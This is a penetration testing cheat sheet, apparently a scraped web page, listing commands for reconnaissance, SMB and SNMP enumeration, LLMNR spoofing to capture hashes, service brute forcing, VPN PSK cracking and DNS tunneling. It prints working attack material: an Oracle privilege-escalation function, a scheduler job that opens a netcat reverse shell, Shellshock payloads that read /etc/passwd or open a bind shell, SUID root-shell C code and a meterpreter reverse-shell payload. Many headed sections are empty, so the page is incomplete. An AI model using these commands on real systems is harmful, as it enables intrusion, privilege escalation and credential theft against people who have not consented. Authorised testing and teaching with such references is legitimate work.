Penetration Testing Tools Cheat Sheet

Introduction

Penetration testing tools cheat sheet, a quick reference high level overview for typical penetration testing engagements. Designed as a quick reference cheat sheet providing a high level overview of the typical commands a third-party pen test company would run when performing a manual infrastructure penetration test. For more in depth information I’d recommend the man file for the tool or a more specific pen testing cheat sheet from the menu on the right.

The focus of this cheat sheet is infrastructure / network penetration testing, web application penetration testing is not covered here apart from a few sqlmap commands at the end and some web server enumeration. For Web Application Penetration Testing, check out the Web Application Hackers Hand Book, it is excellent for both learning and reference.

If I’m missing any pen testing tools here give me a nudge on twitter.

Changelog

16/09/2020 - fixed some formatting issues (more coming soon I promise). 17/02/2017 - Article updated, added loads more content, VPN, DNS tunneling, VLAN hopping etc - check out the TOC below.

• Introduction

  • Changelog

• Pre-engagement

  • Network Configuration

    • Set IP Address

    • Subnetting

• OSINT

  • Passive Information Gathering

    • DNS

      • WHOIS enumeration

      • Perform DNS IP Lookup

      • Perform MX Record Lookup

      • Perform Zone Transfer with DIG

• DNS Zone Transfers

  • Email

    • Simply Email

  • Semi Active Information Gathering

    • Basic Finger Printing

    • Banner grabbing with NC

  • Active Information Gathering

    • DNS Bruteforce

      • DNSRecon

    • Port Scanning

      • Nmap Commands

        • Nmap UDP Scanning

        • UDP Protocol Scanner

        • Other Host Discovery

• Enumeration & Attacking Network Services

  • SAMB / SMB / Windows Domain Enumeration

    • Samba Enumeration

      • SMB Enumeration Tools

      • Fingerprint SMB Version

      • Find open SMB Shares

      • Enumerate SMB Users

      • Manual Null session testing:

      • NBTScan unixwiz

  • LLMNR / NBT-NS Spoofing

    • Metasploit LLMNR / NetBIOS requests

    • Responder.py

  • SNMP Enumeration Tools

    • SNMPv3 Enumeration Tools

  • R Services Enumeration

    • RSH Enumeration

      • RSH Run Commands

      • Metasploit RSH Login Scanner

      • rusers Show Logged in Users

      • rusers scan whole Subnet

  • Finger Enumeration

    • Finger a Specific Username

    • Solaris bug that shows all logged in users:

  • rwho

• TLS & SSL Testing

  • testssl.sh

• Vulnerability Assessment

• Database Penetration Testing

  • Oracle

    • Fingerprint Oracle TNS Version

    • Brute force oracle user accounts

    • Oracle Privilege Escalation

      • Identify default accounts within oracle db using NMAP NSE scripts:

      • How to identify the current privilege level for an oracle user:

      • Oracle priv esc and obtain DBA access:

      • Run the exploit with a select query:

      • Remove the exploit using:

      • Get Oracle Reverse os-shell:

  • MSSQL

    • Bruteforce MSSQL Login

    • Metasploit MSSQL Shell

• Network

  • Plink.exe Tunnel

  • Pivoting

    • SSH Pivoting

    • Meterpreter Pivoting

  • TTL Finger Printing

  • IPv4 Cheat Sheets

    • Classful IP Ranges

    • IPv4 Private Address Ranges

    • IPv4 Subnet Cheat Sheet

  • VLAN Hopping

  • VPN Pentesting Tools

    • IKEForce

    • IKE Aggressive Mode PSK Cracking

      • Step 1: Idenitfy IKE Servers

      • Step 2: Enumerate group name with IKEForce

      • Step 3: Use ike-scan to capture the PSK hash

      • Step 4: Use psk-crack to crack the PSK hash

    • PPTP Hacking

      • NMAP PPTP Fingerprint:

      • PPTP Dictionary Attack

  • DNS Tunneling

    • Attacking Machine

• BOF / Exploit

• Exploit Research

  • Searching for Exploits

  • Compiling Windows Exploits on Kali

  • Cross Compiling Exploits

  • Exploiting Common Vulnerabilities

    • Exploiting Shellshock

      • cat file (view file contents)

      • Shell Shock run bind shell

      • Shell Shock reverse Shell

• Simple Local Web Servers

• Mounting File Shares

• HTTP / HTTPS Webserver Enumeration

• Packet Inspection

• Username Enumeration

  • SMB User Enumeration

  • SNMP User Enumeration

• Passwords

  • Wordlists

• Brute Forcing Services

  • Hydra FTP Brute Force

  • Hydra POP3 Brute Force

  • Hydra SMTP Brute Force

• Password Cracking

  • John The Ripper - JTR

• Windows Penetration Testing Commands

• Linux Penetration Testing Commands

• Compiling Exploits

  • Identifying if C code is for Windows or Linux

  • Build Exploit GCC

  • GCC Compile 32Bit Exploit on 64Bit Kali

  • Compile Windows .exe on Linux

• SUID Binary

  • SUID C Shell for /bin/bash

  • SUID C Shell for /bin/sh

  • Building the SUID Shell binary

• Reverse Shells

• TTY Shells

  • Python TTY Shell Trick

  • Spawn Interactive sh shell

  • Spawn Perl TTY Shell

  • Spawn Ruby TTY Shell

  • Spawn Lua TTY Shell

  • Spawn TTY Shell from Vi

  • Spawn TTY Shell NMAP

• Metasploit Cheat Sheet

  • Meterpreter Payloads

  • Windows reverse meterpreter payload

  • Windows VNC Meterpreter payload

  • Linux Reverse Meterpreter payload

• Meterpreter Cheat Sheet

• Common Metasploit Modules

  • Remote Windows Metasploit Modules (exploits)

  • Local Windows Metasploit Modules (exploits)

  • Auxilary Metasploit Modules

  • Metasploit Powershell Modules

  • Post Exploit Windows Metasploit Modules

• ASCII Table Cheat Sheet

• CISCO IOS Commands

• Cryptography

  • Hash Lengths

  • Hash Examples

• SQLMap Examples

Pre-engagement

Network Configuration

Set IP Address

ifconfig eth0 xxx.xxx.xxx.xxx/24 

Subnetting

ipcalc xxx.xxx.xxx.xxx/24 
ipcalc xxx.xxx.xxx.xxx 255.255.255.0 

OSINT

Passive Information Gathering

DNS

WHOIS enumeration

whois domain-name-here.com 

Perform DNS IP Lookup

dig a domain-name-here.com @nameserver 

Perform MX Record Lookup

dig mx domain-name-here.com @nameserver

Perform Zone Transfer with DIG

dig axfr domain-name-here.com @nameserver

DNS Zone Transfers

Email

Simply Email

Use Simply Email to enumerate all the online places (github, target site etc), it works better if you use proxies or set long throttle times so google doesn’t think you’re a robot and make you fill out a Captcha.

git clone https://github.com/killswitch-GUI/SimplyEmail.git
./SimplyEmail.py -all -e TARGET-DOMAIN

Simply Email can verify the discovered email addresss after gathering.

Semi Active Information Gathering

Basic Finger Printing

Manual finger printing / banner grabbing.

nc TARGET-IP 80
GET / HTTP/1.1
Host: TARGET-IP
User-Agent: Mozilla/5.0
Referrer: meh-domain
<enter>

Active Information Gathering

DNS Bruteforce

DNSRecon

DNS Enumeration Kali - DNSRecon

root:~# dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml

Port Scanning

Nmap Commands

For more commands, see the Nmap cheat sheet (link in the menu on the right).

Basic Nmap Commands:

I’ve had a few people mention about T4 scans, apply common sense here. Don’t use T4 commands on external pen tests (when using an Internet connection), you’re probably better off using a T2 with a TCP connect scan. A T4 scan would likely be better suited for an internal pen test, over low latency links with plenty of bandwidth. But it all depends on the target devices, embeded devices are going to struggle if you T4 / T5 them and give inconclusive results. As a general rule of thumb, scan as slowly as you can, or do a fast scan for the top 1000 so you can start pen testing then kick off a slower scan.

Nmap UDP Scanning

UDP Protocol Scanner

git clone https://github.com/portcullislabs/udp-proto-scanner.git

Scan a file of IP addresses for all services:

./udp-protocol-scanner.pl -f ip.txt 

Scan for a specific UDP service:

udp-proto-scanner.pl -p ntp -f ips.txt

Other Host Discovery

Other methods of host discovery, that don’t use nmap…

Enumeration & Attacking Network Services

Penetration testing tools that spefically identify and / or enumerate network services:

SAMB / SMB / Windows Domain Enumeration

Samba Enumeration

SMB Enumeration Tools

nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target

Also see, nbtscan cheat sheet (right hand menu).

Fingerprint SMB Version

smbclient -L //192.168.1.100 

Find open SMB Shares

nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24   

Enumerate SMB Users

nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254 

python /usr/share/doc/python-impacket-doc/examples
/samrdump.py 192.168.XXX.XXX

RID Cycling:

ridenum.py 192.168.XXX.XXX 500 50000 dict.txt

Metasploit module for RID cycling:

use auxiliary/scanner/smb/smb_lookupsid

Manual Null session testing:

Windows:

net use \\TARGET\IPC$ "" /u:""

Linux:

smbclient -L //192.168.99.131

NBTScan unixwiz

Install on Kali rolling:

apt-get install nbtscan-unixwiz 
nbtscan-unixwiz -f 192.168.0.1-254 > nbtscan

LLMNR / NBT-NS Spoofing

Steal credentials off the network.

Metasploit LLMNR / NetBIOS requests

Spoof / poison LLMNR / NetBIOS requests:

auxiliary/spoof/llmnr/llmnr_response
auxiliary/spoof/nbns/nbns_response

Capture the hashes:

auxiliary/server/capture/smb
auxiliary/server/capture/http_ntlm

You’ll end up with NTLMv2 hash, use john or hashcat to crack it.

Responder.py

Alternatively you can use responder.

git clone https://github.com/SpiderLabs/Responder.git
python Responder.py -i local-ip -I eth0

Run Responder.py for the whole engagement

Run Responder.py for the length of the engagement while you're working on other attack vectors.

SNMP Enumeration Tools

A number of SNMP enumeration tools.

Fix SNMP output values so they are human readable:

apt-get install snmp-mibs-downloader download-mibs
echo "" > /etc/snmp/snmp.conf

SNMPv3 Enumeration Tools

Idenitfy SNMPv3 servers with nmap:

nmap -sV -p 161 --script=snmp-info TARGET-SUBNET

Rory McCune’s snmpwalk wrapper script helps automate the username enumeration process for SNMPv3:

apt-get install snmp snmp-mibs-downloader
wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb

Use Metasploits Wordlist

Metasploit's wordlist (KALI path below) has common credentials for v1 & 2 of SNMP, for newer credentials check out Daniel Miessler's SecLists project on GitHub (not the mailing list!).

/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt

R Services Enumeration

This is legacy, included for completeness.

nmap -A will perform all the rservices enumeration listed below, this section has been added for completeness or manual confirmation:

RSH Enumeration

RSH Run Commands

Metasploit RSH Login Scanner

auxiliary/scanner/rservices/rsh_login

rusers Show Logged in Users

rusers scan whole Subnet

rlogin -l <user> <target>

e.g rlogin -l root TARGET-SUBNET/24

Finger Enumeration

Finger a Specific Username

Solaris bug that shows all logged in users:

finger [email protected]  

SunOS: RPC services allow user enum:
$ rusers # users logged onto LAN

finger 'a b c d e f g h'@sunhost 

rwho

Use nmap to identify machines running rwhod (513 UDP)

TLS & SSL Testing

testssl.sh

Test all the things on a single host and output to a .html file:

./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U TARGET-HOST | aha > OUTPUT-FILE.html  

Vulnerability Assessment

Install OpenVAS 8 on Kali Rolling:

apt-get update
apt-get dist-upgrade -y
apt-get install openvas
openvas-setup

Verify openvas is running using:

Login at https://127.0.0.1:9392 - credentials are generated during openvas-setup.

Database Penetration Testing

Attacking database servers exposed on the network.

Oracle

Install oscanner:

Run oscanner:

oscanner -s 192.168.1.200 -P 1521 

Fingerprint Oracle TNS Version

Install tnscmd10g:

apt-get install tnscmd10g

Fingerprint oracle tns:

tnscmd10g version -h TARGET
nmap --script=oracle-tns-version 

Brute force oracle user accounts

Identify default Oracle accounts:

 nmap --script=oracle-sid-brute 
 nmap --script=oracle-brute 

Run nmap scripts against Oracle TNS:

Oracle Privilege Escalation

Requirements:

• Oracle needs to be exposed on the network

• A default account is in use like scott

Quick overview of how this works:

1. Create the function

2. Create an index on table SYS.DUAL

3. The index we just created executes our function SCOTT.DBA_X

4. The function will be executed by SYS user (as that’s the user that owns the table).

5. Create an account with DBA priveleges

In the example below the user SCOTT is used but this should be possible with another default Oracle account.

Identify default accounts within oracle db using NMAP NSE scripts:

nmap --script=oracle-sid-brute 
nmap --script=oracle-brute 

Login using the identified weak account (assuming you find one).

How to identify the current privilege level for an oracle user:

SQL> select * from session_privs; 

SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO varchar) return varchar deterministic authid 
curren_user is 
pragma autonomous_transaction; 
begin 
execute immediate 'grant dba to user1 identified by pass1';
commit;
return 'FOO';
end;

Oracle priv esc and obtain DBA access:

Run netcat: netcat -nvlp 443code>

SQL> create index exploit_1337 on SYS.DUAL(SCOTT.GETDBA('BAR'));

Run the exploit with a select query:

SQL> Select * from session_privs; 

You should have a DBA user with creds user1 and pass1.

Verify you have DBA privileges by re-running the first command again.

Remove the exploit using:

Get Oracle Reverse os-shell:

begin
dbms_scheduler.create_job( job_name    => 'MEH1337',job_type    =>
    'EXECUTABLE',job_action => '/bin/nc',number_of_arguments => 4,start_date =>
    SYSTIMESTAMP,enabled    => FALSE,auto_drop => TRUE); 
dbms_scheduler.set_job_argument_value('rev_shell', 1, 'TARGET-IP');
dbms_scheduler.set_job_argument_value('rev_shell', 2, '443');
dbms_scheduler.set_job_argument_value('rev_shell', 3, '-e');
dbms_scheduler.set_job_argument_value('rev_shell', 4, '/bin/bash');
dbms_scheduler.enable('rev_shell'); 
end; 

MSSQL

Enumeration / Discovery:

Nmap:

nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156

Metasploit:

msf > use auxiliary/scanner/mssql/mssql_ping

Use MS SQL Servers Browse For More

Try using "Browse for More" via MS SQL Server Management Studio

Bruteforce MSSQL Login

msf > use auxiliary/admin/mssql/mssql_enum

Metasploit MSSQL Shell

msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp

Network

Plink.exe Tunnel

PuTTY Link tunnel

Forward remote port to local address:

plink.exe -P 22 -l root -pw "1337" -R 445:127.0.0.1:445 REMOTE-IP

Pivoting

SSH Pivoting

Add socks4 127.0.0.1 1010 in /etc/proxychains.conf

SSH pivoting from one network to another:

Add socks4 127.0.0.1 1010 in /etc/proxychains.conf

Add socks4 127.0.0.1 1011 in /etc/proxychains.conf

Meterpreter Pivoting

TTL Finger Printing

IPv4 Cheat Sheets

Classful IP Ranges

E.g Class A,B,C (depreciated)

IPv4 Private Address Ranges

IPv4 Subnet Cheat Sheet

Subnet cheat sheet, not really realted to pen testing but a useful reference.

VLAN Hopping

Using NCCGroups VLAN wrapper script for Yersina simplifies the process.

git clone https://github.com/nccgroup/vlan-hopping.git
chmod 700 frogger.sh
./frogger.sh 

VPN Pentesting Tools

Identify VPN servers:

./udp-protocol-scanner.pl -p ike TARGET(s)

Scan a range for VPN servers:

./udp-protocol-scanner.pl -p ike -f ip.txt

IKEForce

Use IKEForce to enumerate or dictionary attack VPN servers.

Install:

pip install pyip
git clone https://github.com/SpiderLabs/ikeforce.git

Perform IKE VPN enumeration with IKEForce:

./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic

Bruteforce IKE VPN using IKEForce:

./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1

ike-scan
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key

IKE Aggressive Mode PSK Cracking

1. Identify VPN Servers

2. Enumerate with IKEForce to obtain the group ID

3. Use ike-scan to capture the PSK hash from the IKE endpoint

4. Use psk-crack to crack the hash

Step 1: Idenitfy IKE Servers

./udp-protocol-scanner.pl -p ike SUBNET/24

Step 2: Enumerate group name with IKEForce

./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic

Step 3: Use ike-scan to capture the PSK hash

ike-scan –M –A –n example_group -P hash-file.txt TARGET-IP

Step 4: Use psk-crack to crack the PSK hash

Some more advanced psk-crack options below:

pskcrack
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key

PPTP Hacking

Identifying PPTP, it listens on TCP: 1723

NMAP PPTP Fingerprint:

nmap –Pn -sV -p 1723 TARGET(S)

PPTP Dictionary Attack

thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst

DNS Tunneling

Tunneling data over DNS to bypass firewalls.

dnscat2 supports “download” and “upload” commands for getting files (data and programs) to and from the target machine.

Attacking Machine

Installtion:

apt-get update
apt-get -y install ruby-dev git make g++
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install

Run dnscat2:

ruby ./dnscat2.rb
dnscat2> New session established: 1422
dnscat2> session -i 1422

Target Machine:

https://downloads.skullsecurity.org/dnscat2/ https://github.com/lukebaggett/dnscat2-powershell/

dnscat --host <dnscat server_ip>

BOF / Exploit

Exploit Research

Find exploits for enumerated hosts / services.

Searching for Exploits

Install local copy of exploit-db:

 searchsploit –u
 searchsploit apache 2.2
 searchsploit "Linux Kernel"
 searchsploit linux 2.6 | grep -i ubuntu | grep local

Compiling Windows Exploits on Kali

  wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
  wine mingw-get-setup.exe
  select mingw32-base
  cd /root/.wine/drive_c/windows
  wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
  cd /root/.wine/drive_c/MinGW/bin
  wine gcc -o ability.exe /tmp/exploit.c -lwsock32
  wine ability.exe  

Cross Compiling Exploits

gcc -m32 -o output32 hello.c (32 bit)
gcc -m64 -o output hello.c (64 bit)

Exploiting Common Vulnerabilities

Exploiting Shellshock

A tool to find and exploit servers vulnerable to Shellshock:

git clone https://github.com/nccgroup/shocker

./shocker.py -H TARGET  --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose

cat file (view file contents)

echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80

Shell Shock run bind shell

echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80

Shell Shock reverse Shell

Simple Local Web Servers

Python local web server command, handy for serving up shells and exploits on an attacking machine.

How to mount NFS / CIFS, Windows and Linux file shares.

HTTP / HTTPS Webserver Enumeration

Packet Inspection

Username Enumeration

Some techniques used to remotely enumerate users on a target system.

SMB User Enumeration

SNMP User Enumeration

Passwords

Wordlists

Brute Forcing Services

Hydra FTP Brute Force

Hydra POP3 Brute Force

Hydra SMTP Brute Force

Use -t to limit concurrent connections, example: -t 15

Password Cracking

Password cracking penetration testing tools.

John The Ripper - JTR

Windows Penetration Testing Commands

See Windows Penetration Testing Commands.

Linux Penetration Testing Commands

See Linux Commands Cheat Sheet (right hand menu) for a list of Linux Penetration testing commands, useful for local system enumeration.

Compiling Exploits

Some notes on compiling exploits.

Identifying if C code is for Windows or Linux

C #includes will indicate which OS should be used to build the exploit.

Build Exploit GCC

Compile exploit gcc.

GCC Compile 32Bit Exploit on 64Bit Kali

Handy for cross compiling 32 bit binaries on 64 bit attacking machines.

Compile Windows .exe on Linux

Build / compile windows exploits on Linux, resulting in a .exe file.

SUID Binary

Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.

below are some quick copy and pate examples for various shells:

SUID C Shell for /bin/bash

int main(void){
       setresuid(0, 0, 0);
       system("/bin/bash");
}       

SUID C Shell for /bin/sh

int main(void){
       setresuid(0, 0, 0);
       system("/bin/sh");
}       

Building the SUID Shell binary

gcc -o suid suid.c  

For 32 bit:

gcc -m32 -o suid suid.c  

Reverse Shells

See Reverse Shell Cheat Sheet for a list of useful Reverse Shells.

TTY Shells

Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su from reverse shells.

Python TTY Shell Trick

python -c 'import pty;pty.spawn("/bin/bash")'

echo os.system('/bin/bash')

Spawn Interactive sh shell

/bin/sh -i

Spawn Perl TTY Shell

exec "/bin/sh";
perl —e 'exec "/bin/sh";'

Spawn Ruby TTY Shell

exec "/bin/sh"

Spawn Lua TTY Shell

os.execute('/bin/sh')

Spawn TTY Shell from Vi

Run shell commands from vi:

:!bash

Spawn TTY Shell NMAP

!sh

A basic metasploit cheat sheet that I have found handy for reference.

Basic Metasploit commands, useful for reference, for pivoting see - Meterpreter Pivoting techniques.

Meterpreter Payloads

Windows reverse meterpreter payload

Windows VNC Meterpreter payload

Linux Reverse Meterpreter payload

Meterpreter Cheat Sheet

Useful meterpreter commands.

Top metasploit modules.

Remote Windows Metasploit Modules (exploits)

Local Windows Metasploit Modules (exploits)

Auxilary Metasploit Modules

Metasploit Powershell Modules

Post Exploit Windows Metasploit Modules

Windows Metasploit Modules for privilege escalation.

ASCII Table Cheat Sheet

Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.

CISCO IOS Commands

A collection of useful Cisco IOS commands.

Cryptography

Hash Lengths

Hash Examples

Likely just use hash-identifier for this but here are some example hashes:

SQLMap Examples

A mini SQLMap cheat sheet: